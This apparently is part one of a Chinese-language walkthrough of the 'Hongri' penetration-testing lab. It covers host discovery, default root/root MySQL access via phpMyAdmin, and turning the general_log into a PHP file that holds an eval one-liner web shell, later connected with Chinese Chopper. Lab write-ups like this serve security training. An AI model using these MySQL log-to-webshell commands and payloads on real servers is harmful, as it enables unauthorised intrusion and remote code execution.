紅日靶場(內網滲透)——1
1.靶機資訊。
win7 x64:ip:192.168.248.129
2008: ip:192.168.138
win2k3:192.168.52.141
攻擊機資訊:
kali:集成各種攻擊工具 ip:192.168.248.128
win10:主要進行數據整理。
2.資訊搜集。
1)使用kali掃描靶機
netdiscover -r 靶機IP網段
發現win7外網網址為:192.168.248.129
對192.168.248.129進行埠掃描。
發現開放埠80及3306.
確定使用HTTP和MYSQL服務。確定思路,使用SQL注入進行提權。
2)網站資訊搜集
對網目錄進行掃描,發現phpmyadmin頁面:
同時發現網站頁面底部有mysql的連接測試檢測:
嘗試root/root,連接成功:
利用之前得到的資訊,直接登錄phpmyadmin,直接對mysql進行管理:
3)利用sql進行getshell
利用步驟:
1.利用日誌文件。
開啟日誌記錄以及日誌保存目錄
SHOW VARIABLES LIKE '%general_log%'
SET GLOBAL general_log = "ON"
將日誌文件保存為php文件
SET GLOBAL general_log_file="C:/phpStudy/www/1.php"
2.利用一句話馬
執行一句話馬
SELECT '<?php eval($_POST["cmd"]);?>';
利用菜刀進行連接:
發現beifen.rar,應該為網站源碼,下載查看。
打開/yxcms/index.php,發現用戶名admin和密碼123456:
登錄,發現可以進行前台模板管理,注入一句話馬:
通過beifen.rar確定路徑後,菜刀連接,至此win7許可權已經獲取完畢。之後進行內網滲透,請見下一篇文章。